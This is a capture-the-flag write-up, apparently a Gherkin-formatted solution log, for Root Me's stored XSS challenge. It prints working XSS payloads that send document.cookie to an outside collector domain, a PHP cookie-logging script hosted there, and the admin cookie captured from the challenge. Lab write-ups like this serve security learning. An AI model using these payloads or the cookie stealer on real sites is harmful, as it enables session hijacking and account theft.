## Version 2.0
## language: en

Feature:  Web Client - Root Me
  Site:
    www.root-me.org
  Category:
    Web Client
  User:
    jdanilo7
  Goal:
    Steal the admin session cookie using stored XSS

  Background:
  Hacker's software
    |     <Software name>      |    <Version>    |
    |     Firefox Quantum      |    60.2.0esr    |
    |        Kali Linux        |      4.18       |
  Machine information:
    Given The challenge url
    """
    https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1
    """
    And The challenge statement
    """
    Steal the administrator session cookie
    """
    Then I am redirected to the challenge website
    """
    http://challenge01.root-me.org/web-client/ch18/
    """

  Scenario: Fail: Inject testing script
    Given the challenge website
    Then I enter a message
    """
    hi<script>alert(document.cookie);</script>
    """
    And I click the "send" button
    And I get an alert showing a cookie
    """
    uid=wKgbZFwlTShuVAUlESa7Ag==
    """
    Then I validate the cookie value on the challenge website
    And it is rejected
    Then I enter another message
    And notice the page reloads
    Then I look at the page code using the inspect element tool
    And notice the previously injected code is still part of the site
    Given I wait for three minutes
    And I enter another message
    And I click the "send" button
    Then my previous messages are removed
    And I get a message indicating they were read
    And I realise another user who is probably the admin entered the site

  Scenario: Fail: Redirect to a malicious domain
    Given the challenge website
    And a php file named cookiestealer.php
    And hosted on a personal domain at https://www.000webhost.com
    """
    1  <?php
    2    header ('Location:https://google.com');
    3    $cookies = $_GET["c"];
    4    $file = fopen('log.txt', 'a');
    5    fwrite($file, $cookies . "\n\n");
    6  ?>
    """
    Then I enter a message
    """
    1  <script>document.location='http://cookiesgather.000webhostapp.com/
          cookiestealer.php?c='+document.cookie;</script>
    """
    And I click the "send" button
    And I am redirected to https://www.google.com/
    Given I hit the "Go back" button on my browser
    Then the challenge page loads
    And I notice my message was not stored
    And there is no confirmation that it was read either
    Given I check the log.txt file from my personal domain
    Then I see the same user cookie that I had gotten before
    """
    uid=wKgbZFwlTShuVAUlESa7Ag==
    """

  Scenario: Success: Send the cookie without redirecting
    Given the challenge website
    And a php file named cookiestealer.php
    And hosted on a personal domain at https://www.000webhost.com
    """
    1  <?php
    2    $cookies = $_GET["c"];
    3    $file = fopen('log.txt', 'a');
    4    fwrite($file, $cookies . "\n\n");
    5  ?>
    """
    Then I enter a message
    """
    1  <script>document.write('<img src="https://cookiesgather.000webhostapp
         .com/cookiestealer.php?c=' + document.cookie + '" />')</script>
    """
    And I click the "send" button
    And the message is stored without redirection
    Given I wait for three minutes
    And I enter another message
    Then the challenge page reloads
    And my previous messages are removed
    And I get the message indicating they were read
    Given I check the log.txt file on my personal domain
    Then I see the admin cookie was added at the bottom
    """
    ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6
    """
    Then I validate the cookie value on the challenge website
    And it is accepted
